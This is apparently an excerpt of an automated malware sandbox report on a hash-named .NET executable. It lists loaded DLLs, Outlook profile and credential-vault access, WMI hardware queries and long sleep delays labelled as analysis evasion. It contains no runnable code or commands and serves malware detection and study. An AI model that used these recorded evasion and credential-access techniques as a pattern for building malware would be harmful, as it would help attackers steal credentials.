                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeMemory allocated: 3350000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599437Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599328Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599219Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599109Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 599000Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598890Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598781Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598672Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598562Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598453Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598344Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598234Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598123Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 598000Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597891Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597766Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597651Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597531Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597422Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597307Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597188Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 597063Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596938Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596813Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596688Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596578Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596462Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596355Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596234Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596125Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 596015Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595912Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595781Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595672Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595547Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595437Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595328Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595219Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 595094Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594984Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594859Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594750Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594641Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594531Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeThread delayed: delay time: 594422Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe Window / User API: threadDelayed 8661
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe Window / User API: threadDelayed 1187
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599766s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599656s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599437s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599219s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599109s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -599000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598890s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598781s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598672s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598562s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598453s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598344s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598234s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598123s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -598000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597891s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597766s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597651s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597531s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597422s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597307s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597188s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -597063s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596938s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596813s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596688s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596578s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596462s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596355s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596234s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596125s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -596015s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595912s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595781s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595672s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595437s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595219s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -595094s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594984s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594859s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594750s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594641s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594531s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe TID: 7192Thread sleep time: -594422s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4107212038.0000000001685000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllagementCapabilities
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Queries volume information: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe VolumeInformation
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
